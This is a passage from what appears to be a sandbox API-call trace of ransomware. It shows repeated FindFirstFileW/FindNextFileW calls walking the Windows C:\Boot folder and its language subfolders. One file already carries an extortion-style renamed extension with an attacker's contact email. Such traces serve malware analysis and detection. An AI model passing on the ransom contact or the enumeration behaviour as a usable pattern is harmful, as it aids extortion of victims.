lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728048 [0156.437] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.437] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.438] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.438] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0156.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.438] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0156.438] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x182e385, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x182e385, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x182e385, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x100fc, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="BOOTSTAT.DAT.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="BOOTST~1.BAT")) returned 1 [0156.438] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0156.438] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0156.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.439] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728048 [0156.439] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.439] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.440] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.440] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.440] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0156.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.440] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="da-DK", cAlternateFileName="")) returned 1 [0156.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.440] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727f08 [0156.441] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.441] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.441] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.442] FindNextFileW (in: hFindFile=0x727f08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.442] FindClose (in: hFindFile=0x727f08 | out: hFindFile=0x727f08) returned 1 [0156.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.442] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="de-DE", cAlternateFileName="")) returned 1 [0156.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.442] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7280c8 [0156.442] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.443] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48079da, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.443] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.443] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.443] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0156.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.443] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="el-GR", cAlternateFileName="")) returned 1 [0156.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.443] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727e88 [0156.931] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.953] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.954] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.954] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.954] FindClose (in: hFindFile=0x727e88 | out: hFindFile=0x727e88) returned 1 [0156.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.955] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="en-GB", cAlternateFileName="")) returned 1 [0156.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.955] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728248 [0156.956] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.956] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.956] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.956] FindClose (in: hFindFile=0x728248 | out: hFindFile=0x728248) returned 1 [0156.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.956] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.956] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727d08 [0156.957] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.957] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.957] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.957] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.957] FindClose (in: hFindFile=0x727d08 | out: hFindFile=0x727d08) returned 1 [0156.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.957] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="es-ES", cAlternateFileName="")) returned 1 [0156.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.957] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x34ff800 | out: 